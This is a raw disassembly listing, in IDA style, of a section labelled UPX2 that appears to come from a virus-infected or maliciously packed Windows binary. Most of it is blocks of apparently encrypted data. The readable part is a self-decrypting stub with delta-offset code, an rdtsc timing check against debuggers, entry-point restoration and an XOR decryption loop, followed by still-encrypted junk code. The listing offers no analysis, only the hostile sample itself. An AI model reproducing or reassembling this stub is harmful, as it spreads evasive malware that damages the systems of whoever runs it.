dd 91F78A5Fh, 0F66555B0h, 0DE3DAB8Ch, 95104CDBh, 0AFABD1F5h
dd 52AA7BC4h, 0D2AD7DBDh, 0F970EC7Bh, 68F35409h, 0B9E00FF4h
dd 0E7D99C8h, 0EF1909A4h, 88170679h, 47D1BB54h, 61D85DC4h
dd 53CFCA04h, 1EBEC9F2h, 0F2EF8A31h, 0CE38A738h, 19087FEDh
dd 0C62B528Ah, 0D640DA1Ch, 0D9A049E7h, 0B0C8FF41h, 0DE48B21Ch
dd 35A67F64h, 0B8E80549h, 0E5828924h, 0C959E5BDh, 3285E335h
dd 5658F413h, 46B0322Bh, 9D343957h, 0C070ADB1h, 4D6A118Ch
dd 51E18D25h, 62ED5BDDh, 95C01CABh, 0A85335E3h, 8B4539BDh
dd 0E9C72ACFh, 66239EB7h, 26B98905h, 5C51EAA7h, 0D041E5A3h
dd 959D9EADh, 1CD94ED6h, 0FA7B11E4h, 1D9CB0D7h, 326D5AF6h
dd 17CF5D44h, 0A3AB3B47h, 7EDE6D2Ch, 0F21421D7h, 0A158317Ch
dd 86F0E246h, 11C3711Ch, 8B2D019Fh, 8ECE5CA4h, 0D58F31D8h
dd 5F94BEB5h, 0EC3C6CA6h, 0CE74C05Bh, 32EC262Eh, 0EA264E30h
dd 8360F6E9h, 0C571C164h, 0FE5547E5h, 0F51CD279h, 48379A9h
dd 9D9D8DECh, 8D8F25BBh, 179F0F9Fh, 322FC9BAh, 0F1871D6Ah
dd 33936D99h, 0A5AC9DB2h, 2B7F15ABh, 5CEB01FBh, 39201E0Bh
dd 4EB50DA3h, 79AF1EE7h, 31C7A788h, 0CE4BC99Bh, 8117AC91h
dd 2CA8BA61h, 0C667FD90h, 790FA4E5h, 20A43613h, 0E493F58Bh
dd 8EF87424h, 19335224h, 3E40ED83h, 0CB006AD4h, 0DD0B2FADh
dd 9D591AB2h, 0FA0872DFh, 43EBF8CBh, 4E8E1D14h, 0C032F380h
dd 0A425ECBDh, 5504AF9Bh, 0F09382ECh, 60AED978h, 1B98091Dh
dd 0B5940FFBh, 4D8FE24Ch, 66F03AB2h, 19AD9DFCh, 0E080EA57h
dd 61DA1EEFh, 0C6330780h, 16CB795Ch, 0D640EA89h, 41BCADACh
dd 1B90FA67h, 5EC8729Ch, 0D5C42E1Bh, 9770026Ch, 890FA53Ah
dd 0DE4BCB9Eh, 0EA058974h, 8EF854F3h, 6D58F8AFh, 0FF830236h
dd 56336EA7h, 265BC7C7h, 0CFA0500Dh, 0A837D259h, 0FA2AC934h
dd 4FB82234h, 36F82BE4h, 0CE972DDBh, 60F88901h, 9E3833ECh
dd 30487EF1h, 0A0E8589Ch, 0A258D23Dh, 0F19F94A4h, 6902BF5Bh
dd 5CFB5068h, 2E257F65h, 8B33429Ah, 0FE951FF3h, 1E88F26Ah
dd 54944BB4h, 0F69D27FBh, 2693FA52h, 729D52BCh, 0EEE50F95h
dd 0D167025Ah, 8C1BA13Bh, 0E6ED3F9Dh, 36A00A42h, 88906ACCh
dd 0BF50BA24h, 3EA81414h, 0BEE832D4h, 64A73DCBh, 70888701h
dd 0B48CF4DCh, 0F656F2A9h, 7625A704h, 46F27AD2h, 0C6CD57CBh
dd 56C82AA2h, 0A76D82ECh, 3EEF67C4h, 2AC932AAh, 13A57D31h
dd 0E78D474h, 12D83AA4h, 239512E7h, 1380DC6Ch, 0D358F2D8h
dd 0C606A29Ah, 9E2F8659h, 40D8D509h, 504CA70Ch, 1E357F93h
dd 7EE8528Ah, 0DF342A14h, 1605BFECh, 0F1F25AF2h, 3EED3195h
dd 36A03C4Bh, 710B6524h, 1B3152DBh, 4E40ED83h, 1D006AD6h
dd 0D8675EB1h, 0E62D1984h, 760844E3h, 99F364Dh, 4CE8A683h
dd 139B7AE4h, 0FE5EEDA4h, 55FC741Fh, 53626A32h, 847F25BBh
dd 5EC830A6h, 0D604C075h, 8598E24Ch, 6586685Ah, 0C42B8686h
dd 0B3051D44h, 6ED87494h, 0B3209A04h, 0FA357B48h, 0FBE07C8Bh
dd 0F80012B9h, 411D7164h, 8DE864ACh, 0FAF9FDB0h, 0A3980266h
dd 0B0E05A71h, 6FED411Ch, 0C5A2E974h, 2B7D9568h, 0E6508C1Ch
dd 31B8127Ch, 9600C450h, 0C62B3D2Ch, 0B95EAC6Ch, 4A9DF923h
dd 7360FC0Bh, 0D63C2D5Eh, 2D107AE4h, 0C8574A89h, 468AA194h
dd 0CE3CC86Dh, 2D90DA44h, 5CBB3AD6h, 0C42343C7h, 69F5D958h
dd 0EDD00CB4h, 8838F571h, 9DD69854h, 0CB5B6690h, 0C6068A63h
dd 792F715Ch, 76E04AB4h, 0CF30D887h, 0D193F22Eh, 0FB63A53Bh
dd 0D67695B8h, 163D879Bh, 86B05AF2h, 0DC3CB21Ch, 44A31283h
dd 7C84BC0h, 0D06F5A91h, 16DB997Ch, 13F75AD5h, 0EE6EFA89h
dd 46B01AC4h, 86FF70A8h, 0A292265h, 0A5E1DD73h, 8E6379E8h
dd 0AF64A017h, 964D9C2h, 1EAD0FB5h, 8F70EC7Ch, 68F7D621h
dd 0E98479F4h, 9C49ED12h, 6603BD29h, 2B1292FCh, 16B6D2F7h
dd 0BCB144D9h, 0D404CC7Ch, 0F678A2D4h, 891F9014h, 0C2722956h
dd 0D180B067h, 48D0F739h, 0D640AA14h, 2BD98F7Ch, 0B7949B1h
dd 0DE7E8DFCh, 26C78F77h, 297B62FAh, 0E650BA43h, 16EB397Ch
dd 9652ED5Dh, 6BAFC22Ch, 468626E4h, 9E0872DDh, 0B5A7CD40h
dd 0EE188284h, 3958D44h, 0FE68E404h, 22402A94h, 0D4F0D0EBh
dd 5C8F25B3h, 6128BF17h, 0B3C38AC2h, 0E550A9C5h, 0BA5DB1A9h
dd 5D28A4C3h, 9D830156h, 0EB2F6AE7h, 0C606A2A1h, 1E88F25Fh
dd 0F36B5EC0h, 0CE0E9DE8h, 19407767h, 0FBEB528Ah, 0D67695D8h
dd 64130A6Dh, 1A75D1D4h, 0E7488423h, 35D3023Eh, 8FF02845h
dd 85D3AA66h, 0BB231224h, 96365570h, 0EE707244h, 4EF21B84h
dd 0CE4B7385h, 0CEC35FBEh, 0CB4F22BAh, 0A6264241h, 0EE68D23Ch
dd 0DBC32CE0h, 0AE2E928Bh, 8387DAF2h, 5EFE0A39h, 0B6228AF4h
dd 0C886F639h, 5E75BF53h, 0BE2892CAh, 10F5EA50h, 567CF726h
dd 43C79A32h, 1EBECAF9h, 76E00AB4h, 0C9B2A979h, 243A3866h
dd 951FB06Ah, 0E447201Dh, 0F89AA8AEh, 54C3AD26h, 0BA6A3978h
dd 0B5F808FBh, 0B8C71E71h, 625FBA24h, 0C157E8A2h, 0A998DF2Bh
dd 7BA7C21Ah, 46862156h, 0A19CC723h, 639FCA02h, 4E8E19CAh
dd 9990F769h, 6BE5D20Ah, 56F6151Ch, 0AE72D0BDh, 390C6FBBh
dd 0CB3732AAh, 0B616B132h, 310457B3h, 0F32F3A92h, 0BE1EA9BAh
dd 28E85FD9h, 0DB27429Ah, 0C606A57Ch, 0DC1D0D0Ah, 0F5E07C8Fh
dd 0F807DEA9h, 0CE53FA64h, 7EE852BCh, 5741C049h, 18AFB281h
dd 890002C4h, 0CB3C37DDh, 0F6250A42h, 7130E10Fh, 6391B5D4h
dd 3E9E0708h, 96105717h, 0F22DC206h, 62CC9BE2h, 0EB791ED0h
dd 3288AA27h, 3B47DD73h, 5CC492E1h, 2C802DC3h, 373FD56Bh
dd 0D6357DC2h, 0BE62EE12h, 5EC832B9h, 49856294h, 370D1DB3h
dd 56F47E2Fh, 80402771h, 460BEA62h, 545924A4h, 0E3439802h
dd 1E889A0Ah, 0B26B4A4Bh, 9E6AA266h, 1A826F9Bh, 0BA6B528Ah
dd 8A7E2B1Ch, 5BC43D53h, 8236D9C7h, 21B233F4h, 0C9DFE28Bh
dd 4D999D33h, 0E650CE9Ch, 8619F97Ch, 96006AFBh, 0EE58DFC4h
dd 4690D884h, 9E084264h, 0F6702234h, 6A7A228Ch, 0A795C2E4h
dd 0FD80D23Ch, 94C02A94h, 0FA9582C0h, 28BDD660h, 22C8CA1Fh
dd 0B6C8EAEDh, 8578E24Ch, 3BE01EF0h, 53A98877h, 16B6D2D3h
dd 9139F844h, 0C2F2FBFBh, 188FF35Ch, 93E24FB7h, 51523CC1h
dd 8815FF73h, 90010010h, 1C39068h, 0FFC48BEDh, 0E85B93D0h
dd 59h, 824648Bh, 4EBB8h, 64FAEB00h, 18A167h, 0F30408Bh
dd 830240B6h
dd 3C7500F8h, 0E8h, 0ED815D00h, 402334h, 237B858Bh, 85030040h
dd 402383h, 858BF08Bh, 40237Fh, 23838503h, 8B500040h, 0ACC933FEh
dd 238B8532h, 41AA0040h, 23878D3Bh, 0EF7C0040h, 64C02BC3h
dd 0FFh, 1B2h dup(0)
dd 7C816FD7h, 1405h dup(0)
; ---------------------------------------------------------------------------
call $+5
mov eax, [esp]
cld
mov [eax+2FE3h], ebx
test dword ptr [eax+28A0h], 80000000h
mov ebx, [esp+4]
jz short loc_3143204B
pop ecx
mov [eax+2FE7h], esi
mov [eax+2FEBh], edi
cmp byte ptr [eax+28A4h], 0E8h
jnz short loc_31432042
add ebx, [eax+28A5h]
mov ebx, [ebx+2]
push dword ptr [ebx]
jmp short loc_3143204A
; ---------------------------------------------------------------------------
loc_31432042: ; CODE XREF: UPX2:31432033�j
mov ebx, [eax+28A6h]
push dword ptr [ebx]
loc_3143204A: ; CODE XREF: UPX2:31432040�j
pop ebx
loc_3143204B: ; CODE XREF: UPX2:3143201D�j
push ebp
mov ebp, eax
sub dword ptr [esp+4], 9E05h
sub ebp, 361005h
mov edi, [esp+4]
lea esi, [ebp+3638B0h]
mov ecx, 71h
rep movsb
call sub_314320C0
mov ecx, eax
call sub_314320C0
sub eax, ecx
jz short loc_31432094
cmp eax, 100h
ja short loc_31432094
lea eax, [ebp+3610D3h]
mov dl, [eax-10h]
call sub_314320C4
jmp short loc_314320D3
; ---------------------------------------------------------------------------
loc_31432094: ; CODE XREF: UPX2:3143207B�j
; UPX2:31432082�j
test dword ptr [ebp+3638A5h], 80000000h
jz short loc_314320BE
lea esi, [ebp+3638A9h]
mov edi, [esp+4]
movsb
movsd
mov esi, [ebp+363FECh]
mov edi, [ebp+363FF0h]
mov ebx, [ebp+363FE8h]
loc_314320BE: ; CODE XREF: UPX2:3143209E�j
pop ebp
retn
; =============== S U B R O U T I N E =======================================
sub_314320C0 proc near ; CODE XREF: UPX2:3143206D�p
; UPX2:31432074�p
rdtsc
retn
sub_314320C0 endp
; ---------------------------------------------------------------------------
db 0DAh
; =============== S U B R O U T I N E =======================================
sub_314320C4 proc near ; CODE XREF: UPX2:3143208D�p
mov dh, dl
mov ecx, 27D2h
loc_314320CB: ; CODE XREF: sub_314320C4+C�j
xor [eax], dl
inc eax
add dl, dh
loop loc_314320CB
locret_314320D2: ; CODE XREF: UPX2:3143212D�j
retn
sub_314320C4 endp
; ---------------------------------------------------------------------------
loc_314320D3: ; CODE XREF: UPX2:31432092�j
pop ebx
push edi
mov ds, word ptr [eax-54881C43h]
in al, 0D0h
db 36h
push ecx
popa
cwde
into
and [ecx-1DF7D0ACh], edx ; CODE XREF: UPX2:314320E9�j
leave
jns short near ptr loc_314320E2+4
mov [edi], esp
mov ebp, 5E0DD4E4h
adc [edi-7Fh], bl
and ah, [ebx]
shl byte ptr ds:0BEB661C3h[esi], cl
rep sbb ds:6D39EB13h[eax], dh
mov eax, [ebp+edi*2-52h]
mov dl, 0FEh
xor al, 4Bh
adc [ebx-4Ch], esi
mov ds:6A7539EFh, eax
pushf
mov dword ptr [esi-64h], 0F7C77709h
mov ah, 0B6h
out 34h, eax
add al, 0A3h
xlat
pop ebp
xchg edx, ebp
cmp [eax+7Bh], bl
mov al, 0B8h
jge short locret_314320D2
mov ecx, 69C36138h
pushf
inc edx
sub [edx], al
fdivr st(5), st
cld
add eax, 0B3B07B37h
retn 0CE2h
; ---------------------------------------------------------------------------
db 5Fh
dd 7437BD14h, 3176D3F5h, 7F70BED2h, 9900264Ch, 3609EBC6h
dd 0CFA6B379h, 12792AEAh, 0F37639BFh, 0D43364D1h, 4A7D7EBCh
dd 0D79FFE24h, 69212AF8h, 0F0DA8B80h, 0B9104433h, 0D7F1483Bh
dd 0BAD63D62h, 224BAD7Ch, 857053FCh, 0DE73DE0h, 0CF7FF633h
dd 0C2DE357Ah, 0AF5FB619h, 92B8DD85h, 0EF0CFBECh, 1789AEE2h
dd 2245E928h, 0CC58489Bh, 0ACD5CA81h, 86ADC174h, 819080C9h
dd 565D9D43h, 3A60B0B9h, 0B7BC4B97h, 8930564Ah, 448DC641h
dd 7F83264Ch, 425E9BC8h, 2F16A11Ch, 120E4C55h, 28154FEDh
dd 6F08186Fh, 7C656609h, 3F11CD24h, 2C7B3831h, 6A887FF4h
dd 0EA1035D0h, 0CCED619Bh, 7BE03017h, 0A647717Ch, 8AB0D628h
dd 980C79EFh, 3243A58Ch, 0CAE81E34h, 1106F315h, 9BD0DE32h
dd 9020461Ch, 0B41D51D4h, 4FF02007h, 0DCDC7164h, 0DC0E60Eh
dd 1228FBF9h, 851BB6EAh, 0D2F41DFDh, 3A8D07ACh, 2FC8D804h
dd 3C2207E9h, 8D3D4DE4h, 0FAECA5AEh, 4A02723Fh, 2789362Fh
dd 24236711h, 0F10B35ECh, 0F25FA7A8h, 1D6CD142h, 0B3D8FD4Ch
dd 4CD5998Ch, 1A8F8CFh, 2A951698h, 50E71ACBh, 0D077062Ch
dd 4A490494h, 0AB0D2FCh, 0F3183E0Ch, 0C1559CCh, 47E8380Fh
dd 0A8D4795Ch, 0F8B8DE06h, 0FA48166Ch, 888AAD4h, 0C618D73Ch
dd 625914F3h, 9BC0E764h, 54BDB174h, 29080E7h, 0D2F91E4Eh
dd 1361353h, 0A720EE22h, 0E330567Ch, 7298BCB5h, 39592626h
dd 0BD62E4BEh, 9CEB3C89h, 0D1C9B584h, 41D67B6Fh, 0ED082E62h
dd 4A72A238h, 0B2DE1624h, 4E0E668Ch, 82E482B0h, 0D182A3A3h
dd 0E7F59EF2h, 0BAD611E6h, 9FC5A7A7h, 8A86ED22h, 1A8B30D5h
dd 5A80A4B8h, 0FEFAB3B7h, 255076AAh, 92BADE80h, 18A5CD6Ch
dd 9D8898EFh, 4F7F174Ch, 326E4958h, 0A13A6387h, 72D74E42h
dd 231539DDh, 59F8287Ch, 0C5B6029h, 0A3B81114h, 3260D3F3h
dd 0FF13BED2h, 0DA361DA6h, 33979457h, 0F755791Dh, 993868BCh
dd 4C9B3461h, 1D01CD54h, 0CFFF97CDh, 0B2EEC64Eh, 1A41DE64h
dd 0EA1543F4h, 61100060h, 0A478F40Bh, 0BE90F9F5h, 484B8F17h
dd 0DD49D5BCh, 0EA723E0Eh, 4F571341h, 0DB510E02h, 0A750769Ch
dd 6D469300h, 5146B993h, 62C5AA59h, 0ACF0163Ch, 361FF30Fh
dd 1724D4A7h, 34135AE1h, 0E3F61ADCh, 51537846h, 0CF82846Eh
dd 0A2A23A9Fh, 0A405F14h, 185435E4h, 0B0C4AD4Ch, 4268E6B4h
dd 0EABAFE1Ch, 1C520CD5h, 943539BCh, 0BA08186Fh, 2230523Fh
dd 0B2D88E2Dh, 1A2AB207h, 0C2C2027Fh, 0E87A3636h, 3A78F496h
dd 0BAE07625h, 48196EFEh, 1F4F8603h, 0F22E0592h, 0A505FF93h
dd 0C3EF8A3Bh, 9FDD769Ch, 928ECE04h, 0FA2C45D5h, 916725D4h
dd 0CA1D9799h, 0BF5848B4h, 0ACD4D189h, 52C8B174h, 0B0DC88h
dd 2C6DE1BBh, 0BF60B097h, 96BDB1D4h, 0A311894h, 728956E4h
dd 0BF53264Ch, 370AEBF0h, 0C3A2A67Bh, 775437F2h, 2DA0A38Bh
dd 0E20D61BCh, 26C569BCh, 4DD8C81Bh, 2C7BE419h, 175799F4h
dd 0EA260D1Ah, 50129EAEh, 819693D3h, 0AF16EA2h, 1DB0D6FDh
dd 0FE91DF4Fh, 0A5D7F2E8h, 0F4D3B4A1h, 0A9A6459Ch, 0A48488A1h
dd 0AD74466Ch, 59363B2Bh, 0A75160Ah, 0B11E18D0h, 74B2E2F2h
dd 0A0C3A8Bh, 40FAB6B6h, 0E94E8BBBh, 0FAE5869Ah, 4A5B3260h
dd 0A3053FBh, 910977D7h, 8C851F76h, 3768B888h, 8EAC772Eh
dd 604B3DA0h, 0FB88B29Fh, 0E206B395h, 1A24C6BCh, 0E288AF72h
dd 74D599DFh, 7A8F8CFh, 0E5646F9Ch, 5A5CEA3Bh, 86B683A3h
dd 0E7A06EA2h, 0D94F2901h, 0C95EAB9Bh, 0D46BA6FAh, 0C3C0CAB5h
dd 0D507769Ch, 0A4839891h, 0BCB5B96Ch, 8B8898EFh, 350FED54h
dd 323224A4h, 9AAAE666h, 3404E1Eh, 0E190B2DCh, 82F87480h
dd 0FEEB8AC6h, 0DA9E0CEBh, 0A306223h, 0A87077D7h, 57FFD9B3h
dd 747DC821h, 0FB81A41Ch, 58ADA1D4h, 0F9A0F0D7h, 72CB0E90h
dd 4A28CEE4h, 0B2D8CE2Dh, 1A4068E4h, 82A8CEF5h, 0EA10365Ch
dd 52789EC4h, 0BAE02E89h, 22486E94h, 75E380ADh, 0C4236CF1h
dd 0F6D90DCCh, 399DCEB0h, 0A793987Eh, 0A4A1AF91h, 6FDF146Ch
dd 62BE957Eh, 0F59C93B5h, 24B07E92h, 0D6C0E60Ch, 7743211Bh
dd 3E2E6ACh, 0B7947732h, 5B36E3CBh, 0E3AD9B78h, 9FCF067Ch
dd 72AE85B6h, 0E570A3C5h, 1EAB8E82h, 0CFA3975Eh, 77553FCAh
dd 10C28988h, 917C4D31h, 1904C0E0h, 0B2AC9D41h, 683415E0h
dd 82C6AB98h, 8B75441Fh, 3B3EFBB0h, 0BAA16340h, 432D1CD7h
dd 0E3F6B388h, 93555B08h, 34E9D6BCh, 81E84F53h, 5E3113EEh
dd 0FDCA8E61h, 8953230Fh, 10CBAE95h, 0AF847759h, 5D351BF6h
dd 0F2948378h, 66492B06h, 0FE2F5DCh, 869D6A25h, 5B05F4C4h
dd 0D08BEE70h, 6F443719h, 1EF7D1B0h, 0AA6C4324h, 2C3BBC87h
dd 0C2A3867Dh, 57382AEBh, 2ED4AF94h, 836D5C3Ch, 233696D8h
dd 0DB8C9B48h, 751403E1h, 0F6DBB7A7h, 83445B39h, 1478FBA9h
dd 0F685635Eh, 433A0CFDh, 0CDB0AF8Eh, 9B5E4A01h, 2EC1C3A0h
dd 0A0817C40h, 593502E9h, 0F7FFDE45h, 96490018h, 18E1FDB1h
dd 0AFB71659h, 5E3138D0h, 0F7A9B269h, 676F4E11h, 0EFFFBA8h
dd 9A9D7231h, 5604E8CDh, 0E5C8AF71h, 6F642219h, 1BDECE89h
dd 0BB4E4320h, 4229EBD9h, 0FEA4935Bh, 424833E1h, 3BC8B28Dh
dd 966D6954h, 3902F3EAh, 0B2B6914Dh, 4C3403CBh, 0EBDBBC91h
dd 92555833h, 373F9E85h, 0D68F5058h, 6B2D03E1h, 0F8DFB092h
dd 9B6C5F09h, 5AC1C8A3h, 0A6896178h, 58321FD0h, 0D3C1AC65h
dd 8A410B6Ch, 15EDC782h, 0A3B67073h, 7D581BC8h, 0DCAE837Ch
dd 4F4D221Dh, 3E0C6BDh, 0D2B9792Ah, 5405F6E3h, 0C1A79C44h
dd 0A432519h, 11F7CCB4h, 0E9735529h, 3001C886h, 0FAD0826Fh
dd 775B31F6h, 4893B59Fh, 96704B1Ah, 3E15C5BCh, 0D7B49762h
dd 683412CDh, 0F6DDAC9Dh, 0EA514539h, 140CFB97h, 0EE856A45h
dd 222D03FDh, 0EFD5BAAFh, 8B4B3E14h, 37E5D2BFh, 0A7856760h
dd 431619C8h, 0FBECBB68h, 0AF202301h, 12E9C3BAh, 0BD957F6Ah
dd 5B1E18EBh, 0CCC08360h, 775C3C1Dh, 6D1DABDh, 0D29B7128h
dd 4E09F4FBh, 0CEA1A871h, 7E7E5619h, 7F2DAA5h, 0A850523Fh
dd 2E01F8DDh, 0D9B59179h, 775331D0h, 0EEEC682h, 836D5C17h
dd 2336F3C8h, 0FCD89B48h, 7F3225F8h, 0D2CDBA95h, 8F73592Eh
dd 1C78EDB7h, 0DF924558h, 722D1AF5h, 0EFD3B98Eh, 8A5D4D17h
dd 19F4E8CCh, 0B6896B46h, 493525F9h, 0FCD7B770h, 0B954086Ch
dd 16E9CBA6h, 0AF834359h, 5D2A2ED6h, 0E9B3836Fh, 4F5C0074h
dd 3C6C6BDh, 0B4B76921h, 4E03E3FFh, 0A2A6817Dh, 7A7F2232h
dd 1BDED081h, 94004320h, 2718C1C0h, 0C5A2A672h, 614B3BE7h
dd 1FCBA9B8h, 96462E3Ah, 2415E6F3h, 0C6BB9B77h, 1A2E09E5h
dd 0F0F8BABAh, 89754233h, 2011C8B0h, 0D6817358h, 4D250BD9h
dd 0C4B0AF8Eh, 976D6F10h, 34C9DFBEh, 0AF9A6152h, 453902FDh
dd 0F9D78A6Ah, 0B4202809h, 0BFAF9A0h, 0A3A67348h, 532D0AD6h
dd 0F7A5AB60h, 2513C1Bh, 3FFCC28Eh, 0BD9B772Ah, 4E33E3C8h
dd 0C5A68766h, 64713928h, 6CBD797h, 0BD6E4F3Eh, 33BD9B4h
dd 0D8B1824Fh, 12482BF0h, 9CFAA8Fh, 81675D31h, 4A04F3D7h
dd 0DCB69147h, 1A3405E9h, 0EADCAB93h, 88644533h, 3F19F0BDh
dd 0DF920649h, 514818F7h, 8AD4B899h, 997B5117h, 1380D2A9h
dd 0B08D7A5Ah, 692413F2h, 0F7CBB168h, 9E4E2724h, 2B88CBB8h
dd 0B8956252h, 752C1BCAh, 0F5839269h, 614D201Ah, 39F4D3A8h
dd 0B78C7F30h, 4E0ECFACh
dd 0C7A69C71h, 6F401908h, 3B98FF8Ah, 0A8655222h, 0D1CEBDAh
dd 0FFBE936Ch, 127932F6h, 1FD4A8A5h, 966D4026h, 2E11F3EEh
dd 0D7B49762h, 4C04278Ch, 0B1E19EB5h, 0A654186Eh, 372A9E88h
dd 0D58C454Bh, 47030BE7h, 0EFE2D685h, 97687103h, 23E5EDA2h
dd 0C2A97671h, 7B3713CEh, 0EBCABB71h, 8F4C273Ah, 23F0EBB1h
dd 0AD95443Ch, 642C1BF7h, 0FFB58A6Dh, 2693631h, 66858Ah
dd 59AE4846h, 6861EC78h, 0F4D09CEBh, 3540C383h, 0B613BED2h
dd 8A56701Ah, 5A1871E2h, 910E63E3h, 0D6BB5EB2h, 726298FCh
dd 1941A354h, 22215E97h, 5AD8FE24h, 19642A01h, 87C2CE9Eh
dd 8043660Dh, 2B415C1h, 0EEB0D2A7h, 70192EFEh, 8C2529AFh
dd 71180858h, 0CF7FAA08h, 0C2DE323Ah, 0E958B21Fh, 0A9AC4B89h
dd 3313465Ah, 0ADAAEBEh, 0CAC2160Ch, 6309BA2Fh, 0CB90A666h
dd 0C2AB561Eh, 64FAE2D4h, 0D06DE114h, 0B960B090h, 70FBCED0h
dd 933F96F9h, 2A424926h, 8DC3E46Fh, 83807187h, 0A52F09E3h
dd 1238FB00h, 73C896ECh, 69082E24h, 0C170FC68h, 0DA9894E8h
dd 1A50668Ch, 0E8FACC9Eh, 9A195E5Ch, 52129EC4h, 45B0557Dh
dd 14739801h, 75E989FCh, 0C42378F1h, 2E7F23CCh, 0BE658545h
dd 0C9504089h, 922D5308h, 0F920707Ch, 9DDBF905h, 28759DEEh
dd 0BF58489Fh, 9AE71D83h, 0FD03A674h, 0EF1B4923h, 0D2CE25BEh
dd 12280921h, 0B820EE14h, 81CFA983h, 44A35861h, 958FAB4Ch
dd 0AA688E9Ch, 552F0915h, 29D2DB0Fh, 0BA25C6DAh, 6D850E20h
dd 4A70BEE0h, 4D260ACCh, 0E8C5ED73h, 7A8F8CFh, 671B429Ch
dd 5250F74Bh, 443FEE2Ch, 0E5C3916Bh, 62E515A3h, 0F2183E64h
dd 4A6D2791h, 0F1E8382Fh, 0B7D5FB55h, 0C3B8E81Ah, 0AA711738h
dd 0F777FF85h, 0CAC62D4Eh, 0CD7C7A23h, 0ACFBA099h, 6EA1374h
dd 6A78E3DCh, 8FF81E44h, 215F6B2Dh, 5DA2EE22h, 113AC3F1h
dd 20C8BED2h, 0DA240681h, 86EB8E9Eh, 2F179010h, 120E45D4h
dd 0FF67E621h, 0E23E3506h, 4A5A9698h, 0A8B23D79h, 1A498ED4h
dd 0C025CEF4h, 23EE9C3Dh, 3BBB6EB1h, 8CDC66B9h, 2ACC6B94h
dd 1F3994F4h, 0F22E0204h, 0F43443Bh, 0C2E80EDCh, 0C7D12B9Ch
dd 928EC59Dh, 0C644DBE7h, 1E0BAEE2h, 0C5F01E18h, 3258C720h
dd 922C670Ch, 56284E76h, 6A91B2B4h, 486DE144h, 0B160B097h
dd 864C63E8h, 0A305778h, 9A98D4B4h, 0DA002648h, 423ADCE2h
dd 3C45094Bh, 213868BFh, 7E374B25h, 0B3082E55h, 1B72FCEDh
dd 0B2B0FF4Eh, 4800668Ch, 0B9CA5B0Bh, 6F86366Ah, 223EA32h
dd 0BBE46E78h, 0DD1F6E94h, 8890F248h, 67E73E64h, 5AB69A8Eh
dd 0B6288B6Dh, 7A44958Ah, 92D20A8Fh, 0AC77173Eh, 59523B2Bh
dd 4FA9160Ah, 64880B64h, 0A18673F3h, 55A54E42h, 0C7E498h
dd 45754600h, 3A6087A8h, 0C808DDBFh, 0A1C30F6Ch, 22C8EEB4h
dd 8850761Ch, 79021B4Bh, 6E51F62Ah, 12385C8Ch, 7284B213h
dd 0DE3ABBABh, 0B523968Ah, 84E4CCB1h, 1E823B8Ch, 88964EF4h
dd 61563729h, 646DE649h, 37F9E52Ch, 14586E01h, 0DC61D5FCh
dd 329CEC9Bh, 5B9F2EC3h, 46E70E34h, 2A50778Ch, 0E782E084h
dd 0C4A0007Ch, 630CA1D4h, 4AF0163Dh, 0C32D5E9Ah, 0CAFE674Ah
dd 776F003Dh, 0AC5F3D9Eh, 0F9B71F02h, 3A0AD762h, 5D9BB845h
dd 3C0C7CE9h, 0B3A3E7E4h, 0DADFA343h, 0C7E58EB4h, 0AAE6E88Dh
dd 1E505EEEh, 2AA0C6ECh, 0C89DD107h, 7770A080h, 0B2D8FE28h
dd 1AFFE383h, 3341CEF4h, 6B10365Ch, 1B2ACEFAh, 1F65097Ah
dd 0A1486E94h, 0B61CDE3Ah, 6B9C3169h, 6680A6CCh, 6E1B7B14h
dd 0AF5F4CA0h, 92B8DE88h, 0DA004BC1h, 43B58EF4h, 0BF84735Bh
dd 1264D2DBh, 0E4419A79h, 76406E8Bh, 0EBE1C3A8h, 0E8881D3Ah
dd 5215A983h, 0A237A9D2h, 1A8A6773h, 8598BEC3h, 4FFF74AEh
dd 425EB57Eh, 0FA80362Fh, 1BD00ED4h, 3EA0C6ECh, 8E66593Bh
dd 4A14F7D3h, 8EE26BDBh, 0DAC566BAh, 4B9BF880h, 0D674B3D5h
dd 3A299EF2h, 3AE0042Ch, 721E3FC5h, 0B68E4303h, 67953E52h
dd 5AB6BD5Fh, 96213D64h, 7B0226CDh, 0E02D2155h, 7D207057h
dd 0F7778AD0h, 0CAC62D7Ah, 0BFD8BD5Ch, 9AF6F367h, 68EBB775h
dd 9591DCDDh, 0D68BE177h, 87E09353h, 0A2FEAE1Ch, 8F6E227Dh
dd 41C2CA24h, 69D0AD97h, 7E388DBFh, 0B7674391h, 0A8B35EB2h
dd 7AA0C7E0h, 0E300A4DFh, 0B27396BCh, 39B8350Fh, 7BE69547h
dd 60EFCB80h, 693EDDA9h, 0D92B9103h, 6E6B51E0h, 62223AC4h
dd 75DA84ADh, 0CE1EAB9Bh, 0D70BA6FAh, 0C2DE354Eh, 15CB21Fh
dd 95515DCBh, 0FA4A41ABh, 2D01AE3Ch, 85A3D53Fh, 730F2AE2h
dd 0D79CA35Eh, 6D5A2D1Dh, 1EF6D9AFh, 0BC914918h, 4917E9C8h
dd 0D0BDAD48h, 7E5E330Eh, 1EADBB2h, 866E4925h, 2E18F6F1h
dd 0D8B58473h, 60590A84h, 32D4A38Bh, 0E27C5D3Bh, 1A7096BEh
dd 62578C71h, 7E2314E5h, 0E7C1B4DAh, 8660183Ah, 1131D0C4h
dd 0DF932667h, 432B1AFBh, 0DFBAB19Fh, 0D24A7B37h, 13CFECABh
dd 0B4CE2E7Ah, 5F2404F5h, 92508B0Eh, 0A720466Ch, 7C2B4355h
dd 4F36160Ah, 326E6BCFh, 455190Ch, 0C328784Fh, 56E4A934h
dd 6773002Eh, 3A56BDFAh, 8CF4424Dh, 8B567C09h, 78541DAh
dd 80BDAB6Fh, 0C968B888h, 0F87F46Ah, 97B5FBE2h, 7A96F13Dh
dd 0D5FFABDBh, 0C38A968Ah, 0FC540462h, 1BF19D72h, 0E3430116h
dd 15EB29B4h, 76041D3Bh, 0EF950224h, 6240EB52h, 62B0D6CAh
dd 0F2183E6Ch, 74C3E09Fh, 0C2A44270h, 11FAE363h, 52B3DE32h
dd 90B35118h, 0F777FDD6h, 0CAC62D6Eh, 3A2CBE21h, 0DAC863F2h
dd 0D2D74E42h, 94145E4Fh, 0D910E1BBh, 696086ACh, 0ED97AD52h
dd 4674782Fh, 0E767BEA8h, 0DA361DE6h, 0BD96E75Ch, 5F3E1EE3h
dd 9FC7A17Bh, 7A96D43Dh, 6785E767h, 4A46D6B8h, 0E389AF75h
dd 4B1137DCh, 0B90E5B0Bh, 0E1F8366Ah, 7789EC4h, 89B2437Fh
dd 6E0C40A6h, 1F4FD6B0h, 0F22E05CEh, 5A80AC24h, 0B29B7934h
